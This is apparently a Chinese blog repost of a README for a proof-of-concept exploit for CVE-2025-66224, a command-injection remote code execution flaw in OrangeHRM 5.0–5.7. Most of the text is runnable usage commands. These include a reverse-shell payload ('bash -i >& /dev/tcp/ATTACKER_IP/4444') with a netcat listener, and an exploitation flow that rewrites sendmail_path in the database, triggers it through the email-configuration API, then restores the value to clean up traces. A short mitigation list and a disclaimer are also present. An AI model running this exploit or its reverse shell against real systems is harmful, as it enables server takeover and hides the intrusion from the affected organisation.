OrangeHRM RCE 最新漏洞利用 - CVE-2025-66224

zhengfei6112025-12-24 22:09

📋 描述

该概念验证(PoC)通过配置参数中的命令注入,展示了OrangeHRM中的远程代码执行(RCE)漏洞。sendmail_path

该漏洞的工作原理是:

  1. 向MySQL数据库(表)注入恶意负载hs_hr_config

  2. 通过电子邮件配置API端点触发负载执行

  3. 自动恢复原始值以清理走线

🎯 受影响版本

  • OrangeHRM 版本 5.0 至 5.7

⚠️免责声明

该工具仅供教育和授权安全测试目的。未经授权访问计算机系统是非法的。作者不对该工具造成的任何滥用或损害负责。

🔧 要求

复制代码
复制代码

pip install requests mysql-connector-python

📦 安装

复制代码
复制代码

git clone https://github.com/richard-natan/PoC-CVE-2025-66224 cd PoC-CVE-2025-66224 pip install -r requirements.txt

🚀 用途

步骤1:获取会话Cookie

  1. 通过网页界面登录OrangeHRM

  2. 打开浏览器开发者工具(F12)

  3. 访问存储>Cookies(Firefox)或应用>Cookies(Chrome)

  4. 复制cookie值_orangehrm

步骤2:运行漏洞

复制代码
复制代码

python3 exploit.py -t <TARGET_URL> -c <COOKIE_VALUE> \ -dh <MYSQL_HOST> -du <MYSQL_USER> -dp <MYSQL_PASSWORD> \ -cmd '<COMMAND_TO_EXECUTE>'

示例 - 简单命令

复制代码
复制代码

python3 exploit.py -t http://127.0.0.1:8080/ \ -c "g58tak8pbnheseatv6dggvi31i" \ -dh 172.18.0.2 \ -du orange_user \ -dp orange_password \ -cmd "touch /tmp/pwned"

示例 - 反向壳

复制代码
复制代码

Start listener on attacker machine nc -lvnp 4444 # Execute exploit with reverse shell payload python3 exploit.py -t http://target.com/ \ -c "your_session_cookie" \ -dh 172.18.0.2 \ -du orange_user \ -dp orange_password \ -cmd 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'

📝 参数

参数 短篇 必填 描述
--target -t 目标URL(例如,http://target.com)
--cookie -c 会话 Cookie 值
--cookie_name -cn Cookie 名称(默认:_orangehrm)
--command -cmd 执行目标命令
--db_host -dh MySQL 主机地址
--db_user -du MySQL 用户名
--db_pass -dp MySQL 密码
--db_port -dport MySQL移植版(默认:3306)

🔍 工作原理

漏洞详情

漏洞存在于邮件配置功能中,参数存储在数据库中,之后在未经过适当净化的情况下执行。sendmail_path

开发流程:

复制代码
复制代码
  1. Authenticate to OrangeHRM (obtain valid session cookie) ↓ 2. Connect to MySQL database ↓ 3. Locate hs_hr_config table ↓ 4. Update email_config.sendmail_path value: FROM: /usr/sbin/sendmail -bs TO: /usr/sbin/sendmail -bs && <PAYLOAD> # ↓ 5. Trigger execution via API: PUT /web/index.php/api/v2/admin/email-configuration ↓ 6. Command executes on server ↓ 7. Restore original value (cleanup)

技术细节

脆弱参数: email_config.sendmail_path

数据库:

  • 表格:hs_hr_config

  • 列:= 'email_config.sendmail_path'name

  • 列:= sendmail 命令路径value

触发终点:

PUT /web/index.php/api/v2/admin/email-configuration

🛡️ 缓解措施

  1. 输入验证:对参数实施严格验证sendmail_path

  2. 逃脱:执行前正确转义 shell 命令

  3. 最低特权:以最小权限运行网页服务器

  4. 更新:为 OrangeHRM 应用最新的安全补丁

🔗 参考文献

⚠️请负责任地使用。检测前务必获得适当授权。

相关推荐
小Tomkk7 分钟前
数据库 变更和版本控制管理工具 --Bytebase 使用指南
数据库·bytebase
DarkAthena17 分钟前
【GaussDB】用AI解析UGO中的SQL审核模块的实现
数据库·sql·gaussdb
xdpcxq102925 分钟前
MySQL 5.6 2000 万行高频读写表新增字段
数据库·mysql
huohuopro26 分钟前
Redis安装和杂谈
数据库·redis·缓存
马猴烧酒.37 分钟前
【团队空间|第十一天】基础功能实现,RBAC权限控制,ShardingSphere详解
java·开发语言·数据库
long31641 分钟前
KMP模式搜索算法
数据库·算法
有味道的男人43 分钟前
接入MIC(中国制造)接口的帮助
网络·数据库·制造
Jacob程序员1 小时前
达梦数据库私有服务配置指南
linux·服务器·数据库
isNotNullX1 小时前
数据分析没思路?5 个核心流程帮你理清所有步骤
数据库·数据挖掘·数据分析
OceanBase数据库官方博客1 小时前
高德刘振飞:从自研 OceanBase,回望数据库技术范式变迁
数据库·oceanbase·分布式数据库·高德
热门推荐
01GitHub 镜像站点022025 年大语言模型发展回顾:关键突破、意外转折与 2026 年展望03Claude Code Skills 实用使用手册04OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)05Clawdbot 中文汉化版 接入微信、飞书06Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services07OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书08UV安装并设置国内源09在Trae中使用Pencil MCP10Linux下V2Ray安装配置指南